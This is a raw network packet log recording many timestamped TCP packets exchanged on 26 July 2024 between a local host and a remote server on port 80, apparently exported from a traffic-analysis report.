Jul 26, 2024 18:56:40.474023104 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.475127935 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.475141048 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.475151062 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.475162029 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.475167990 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.475179911 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.475200891 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.504347086 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.504359961 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.504370928 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.504466057 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.506530046 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.506541967 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.506552935 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.506563902 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.506582975 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.506603956 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.554538965 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.554553032 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.554567099 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.554605961 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.554645061 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.554666996 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.554680109 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.554718018 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.554742098 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.554843903 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.554857016 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.554878950 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.554897070 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.555140018 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.555152893 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.555175066 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.555191994 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.555279016 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.555322886 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.555437088 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.555449009 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.555459976 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.555471897 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.555480957 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.555483103 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.555495977 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.555515051 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.555530071 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.556063890 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.556076050 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.556087017 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.556098938 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.556111097 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.556138039 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.556215048 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.556227922 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.556238890 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.556248903 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.556252003 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.556266069 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.556274891 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.556277037 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.556304932 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.557009935 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.557024002 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.557034969 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.557064056 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.557071924 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.557081938 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.557085037 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.557097912 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.557106972 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.557109118 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.557121992 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.557132959 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.557132959 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.557147026 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.557158947 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.557173014 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.557199955 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.557234049 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.557246923 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.557257891 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.557266951 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.557277918 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.557284117 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.557292938 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.557305098 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.557317019 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.557322979 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.557336092 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.557343960 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.557348013 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.557360888 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.557370901 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.557389021 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.558212042 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.558224916 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.558235884 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.558247089 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.558258057 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.558269978 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.558280945 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.558294058 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.558295012 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.558307886 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.558317900 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.558325052 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.558331013 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.558347940 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.558374882 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.561409950 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.561424017 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.561434031 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.561439991 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.561450958 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.561454058 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.561464071 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.561474085 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.561477900 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.561490059 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.561501026 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.561501026 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.561513901 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.561518908 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.561533928 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.561558962 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.561934948 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.561948061 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.561959028 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.561970949 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.561979055 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.561984062 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.561995983 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.562004089 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.562007904 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.562020063 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.562022924 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.562032938 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.562045097 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.562047005 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.562057972 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.562072992 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.562074900 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.562087059 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.562093973 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.562102079 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.562120914 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.562144995 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.562861919 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.562874079 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.562882900 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.562895060 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.562905073 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.562910080 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.562916994 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.562930107 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.562936068 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.562941074 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.562952042 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.562952042 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.562963963 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.562974930 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.562983036 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.562987089 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.562999010 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.563009024 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.563009024 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.563024044 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.563049078 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.581047058 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.581058025 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.581063032 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.581068039 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.581072092 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.581077099 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.581082106 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.581088066 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.581216097 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.595904112 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.595969915 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.596272945 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.596283913 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.596295118 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.596307039 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.596317053 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.596323967 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.596329927 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.596364021 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.596378088 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.698750019 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.698786974 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.698821068 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.698849916 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.698872089 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.698877096 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.698879957 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.698894024 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.698909998 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.698921919 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.698926926 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.698949099 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.698987961 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.699306965 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.699317932 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.699328899 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.699338913 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.699345112 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.699352980 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.699364901 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.699372053 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.699376106 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.699388027 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.699398994 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.699398994 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.699420929 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.699436903 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.700016022 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.700063944 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.700150967 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.700161934 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.700176001 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.700186014 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.700192928 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.700200081 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.700212002 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.700217962 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.700222969 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.700237036 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.700244904 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.700248003 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.700263977 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.700294018 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.713498116 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.713514090 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.713522911 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.713532925 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.713541985 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.713548899 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.713552952 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.713563919 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.713566065 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.713574886 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.713583946 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.713584900 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.713596106 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.713601112 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.713606119 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.713615894 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.713627100 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.713627100 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.713641882 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.713650942 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.713651896 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.713664055 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.713673115 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.713681936 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.713690996 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.713692904 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.713702917 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.713712931 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.713721037 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.713723898 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.713733912 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.713742971 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.713752985 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.713762045 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.713771105 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.713772058 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.713789940 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.713789940 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.713804007 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.713804960 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.713816881 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.713826895 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.713828087 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.713838100 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.713849068 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.713855028 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.713879108 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.713902950 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.713913918 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.713923931 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.713932991 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.713936090 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.713943958 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.713953972 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.713963985 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.713982105 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.714005947 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.714318037 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.714328051 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.714338064 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.714349031 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.714355946 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.714359999 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.714370966 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.714375973 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.714382887 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.714394093 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.714401960 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.714405060 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.714416027 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.714416027 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.714441061 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.714461088 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.715251923 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.715262890 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.715272903 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.715281963 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.715290070 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.715292931 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.715303898 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.715306044 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.715315104 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.715326071 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.715336084 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.715346098 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.715358973 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.715375900 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.716062069 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.716073036 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.716080904 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.716090918 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.716101885 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.716104984 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.716113091 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.716116905 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.716126919 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.716139078 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.716147900 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.716159105 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.716169119 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.716196060 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.716856003 CEST	80	49757	147.45.44.104	192.168.2.4
